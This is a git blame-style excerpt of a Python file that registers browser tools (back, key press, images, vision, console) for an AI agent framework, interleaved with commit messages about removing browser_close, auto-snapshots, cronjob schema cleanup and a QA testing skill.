2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 📜 " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_back " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_back " ] ,
handler = lambda args , * * kw : browser_back ( task_id = kw . get ( " task_id " ) ) ,
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " ◀️ " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_press " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_press " ] ,
2026-03-14 11:34:31 -07:00
handler = lambda args , * * kw : browser_press ( key = args . get ( " key " , " " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " ⌨️ " ,
2026-02-21 20:22:33 -08:00
)
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
2026-02-21 20:22:33 -08:00
registry . register (
name = " browser_get_images " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_get_images " ] ,
handler = lambda args , * * kw : browser_get_images ( task_id = kw . get ( " task_id " ) ) ,
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 🖼️ " ,
2026-02-21 20:22:33 -08:00
)
registry . register (
name = " browser_vision " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_vision " ] ,
2026-03-14 11:34:31 -07:00
handler = lambda args , * * kw : browser_vision ( question = args . get ( " question " , " " ) , annotate = args . get ( " annotate " , False ) , task_id = kw . get ( " task_id " ) ) ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 👁️ " ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
)
registry . register (
name = " browser_console " ,
toolset = " browser " ,
schema = _BROWSER_SCHEMA_MAP [ " browser_console " ] ,
2026-04-05 12:42:52 -07:00
handler = lambda args , * * kw : browser_console ( clear = args . get ( " clear " , False ) , expression = args . get ( " expression " ) , task_id = kw . get ( " task_id " ) ) ,
2026-02-21 20:22:33 -08:00
check_fn = check_browser_requirements ,
2026-03-15 20:21:21 -07:00
emoji = " 🖥️ " ,
2026-02-21 20:22:33 -08:00
)